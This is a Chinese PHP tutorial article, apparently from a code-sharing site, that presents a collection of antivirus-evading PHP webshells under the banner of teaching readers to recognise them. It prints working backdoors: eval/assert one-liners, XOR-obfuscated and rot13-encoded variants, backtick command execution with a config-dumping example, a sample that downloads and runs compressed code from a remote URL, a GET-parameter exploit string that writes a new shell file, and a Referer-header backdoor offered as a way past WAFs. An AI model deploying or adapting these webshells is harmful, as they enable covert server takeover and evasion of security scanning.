教你识别简单的免查杀PHP后门


Posted in PHP onSeptember 13, 2015

一个最常见的一句话后门可能写作这样

<?php @eval($_POST['cmd']);?>

或这样

<?php @assert($_POST['cmd']);?>

tudouya 同学在FREEBUF上给出[一种构造技巧]利用

<?php  @$_++; // $_ = 1  $__=("#"^"|"); // $__ = _   $__.=("."^"~"); // _P   $__.=("/"^"`"); // _PO   $__.=("|"^"/"); // _POS   $__.=("{"^"/"); // _POST   ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);  ?>

构造生成,当然,嫌太直观可以写作这样

<?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?>

然后再填充些普通代码进行伪装,一个简单的”免杀”shell样本就出现了

我们再来看看号称史上最简单免查杀php后门

直接上代码:

<?php
 
$c=urldecode($_GET['c']);if($c){`$c`;}//完整
 
!$_GET['c']||`{$_GET['c']}`;//精简
 
/*******************************************************
 * 原理:PHP中``符号包含会当作系统命令执行
 * 示例:http://host/?c=type%20config.php>config.txt
 *    然后就可以下载config.txt查看内容了!
 *    可以试试更变态的命令,不要干坏事哦!
 *******************************************************/

其实现原理就是PHP会直接将 ` 符号(注意:不是单引号)包含的内容解析为系统命令执行!这样就可以自由变态地扩展了!

再来看同样很简单的一段代码

<?php 
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft"); 
?>

密码page

近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。

Webshell代码如下:

<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(
sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>

关键看下面这句代码,

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

这里执行之后其实是一张图片,解密出来的图片地址如下:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85
然后调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码的。这里执行以下语句来还原出恶意样本代码,

<?php

echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",

'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649));

?>

无特征隐藏PHP一句话:

<?php 
session_start(); 
$_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); 
$_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' ); 
?>

将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。
超级隐蔽的PHP后门:

<?php $_GET [a]( $_GET [b]);?>

 
仅用GET函数就构成了木马;
利用方法:
    ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。
层级请求,编码运行PHP后门:
此方法用两个文件实现,文件1
 

<?php 
//1.php 
header( 'Content-type:text/html;charset=utf-8' ); 
parse_str ( $_SERVER [ 'HTTP_REFERER' ], $a ); 
if (reset( $a ) == '10' && count ( $a ) == 9) { 
eval ( base64_decode ( str_replace ( " " , "+" , implode( array_slice ( $a , 6))))); 
} 

?>

文件2

<?php 
//2.php 
header( 'Content-type:text/html;charset=utf-8' ); 
//要执行的代码 
$code = <<<CODE 
phpinfo(); 
CODE; 
//进行base64编码 
$code = base64_encode ( $code ); 
//构造referer字符串 
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=" ; 
//后门url 
$url = 'http://localhost/test1/1.php ' ; 
$ch = curl_init(); 
$options = array ( 
CURLOPT_URL => $url , 
CURLOPT_HEADER => FALSE, 
CURLOPT_RETURNTRANSFER => TRUE, 
CURLOPT_REFERER => $referer
); 
curl_setopt_array( $ch , $options ); 
echocurl_exec( $ch ); 

?>

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。

我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。

PHP 相关文章推荐
PHPMailer邮件发送的实现代码
May 04 PHP
php源代码安装常见错误与解决办法分享
May 28 PHP
php获取当前时间的毫秒数的方法
Jan 26 PHP
PHP实现UTF-8文件BOM自动检测与移除实例
Nov 05 PHP
基于PHP+jQuery+MySql实现红蓝(顶踩)投票代码
Aug 25 PHP
PHP随手笔记整理之PHP脚本和JAVA连接mysql数据库
Nov 25 PHP
PHP中SQL查询语句的id=%d解释(推荐)
Dec 10 PHP
php常用数组函数实例小结
Dec 29 PHP
php实现生成带二维码图片并强制下载功能
Feb 24 PHP
Laravel框架在本地虚拟机快速安装的方法详解
Jun 11 PHP
php5.6.x到php7.0.x特性小结
Aug 17 PHP
THINKPHP5分页数据对象处理过程解析
Oct 28 PHP
php文件扩展名判断及获取文件扩展名的N种方法
Sep 12 #PHP
php上传功能集后缀名判断和随机命名(强力推荐)
Sep 10 #PHP
ubuntu下配置nginx+php+mysql详解
Sep 10 #PHP
ThinkPHP函数详解之M方法和R方法
Sep 10 #PHP
基于JQuery+PHP编写砸金蛋中奖程序
Sep 08 #PHP
四个常见html网页乱码问题及解决办法
Sep 08 #PHP
php图片水印添加、压缩、剪切的封装类实现
Apr 18 #PHP
You might like
php self,$this,const,static,-&amp;gt;的使用
2009/10/22 PHP
解析Ubuntu下crontab命令的用法
2013/06/24 PHP
PHP垃圾回收机制引用计数器概念分析
2013/06/24 PHP
PHP调试函数和日志记录函数分享
2015/01/31 PHP
PHP版微信第三方实现一键登录及获取用户信息的方法
2016/10/14 PHP
PHP使用curl函数发送Post请求的注意事项
2016/11/26 PHP
Linux服务器下PHPMailer发送邮件失败的问题解决
2017/03/04 PHP
php curl上传、下载、https登陆实现代码
2017/07/23 PHP
php利用ZipArchive类操作文件的实例
2020/01/21 PHP
JavaScript中检查对象property的存在性方法介绍
2014/12/30 Javascript
包含中国城市的javascript对象实例
2015/08/03 Javascript
js实现仿京东2级菜单效果(带延时功能)
2015/08/27 Javascript
微信小程序 devtool隐藏的秘密
2017/01/21 Javascript
详谈表单格式化插件jquery.serializeJSON
2017/06/23 jQuery
vue-router相关基础知识及工作原理
2018/03/16 Javascript
js中apply和Math.max()函数的问题及区别介绍
2018/03/27 Javascript
react用Redux中央仓库实现一个todolist
2019/09/29 Javascript
python生成器的使用方法
2013/11/21 Python
centos6.7安装python2.7.11的具体方法
2017/01/16 Python
python中使用正则表达式的后向搜索肯定模式(推荐)
2017/11/11 Python
详解Python中的正斜杠与反斜杠
2019/08/09 Python
学python安装的软件总结
2019/10/12 Python
Tensorflow进行多维矩阵的拆分与拼接实例
2020/02/07 Python
美体小铺美国官网:The Body Shop美国
2017/11/10 全球购物
全球最大的中文旅行网站:去哪儿网
2017/11/16 全球购物
巴西Mr. Cat在线商店:购买包包和鞋子
2019/09/08 全球购物
药学专业毕业生求职信
2013/10/20 职场文书
就业自荐书
2013/12/05 职场文书
《玩具柜台前的孩子》教学反思
2014/02/13 职场文书
祖国在我心中演讲稿400字
2014/05/04 职场文书
党的群众路线教育实践活动个人承诺书
2014/05/22 职场文书
常务副总经理岗位职责
2015/02/02 职场文书
中秋节慰问信
2015/02/15 职场文书
2016教师廉洁教育心得体会
2016/01/13 职场文书
MySQL中VARCHAR与CHAR格式数据的区别
2021/05/26 MySQL
python和Appium的移动端多设备自动化测试框架
2022/04/26 Python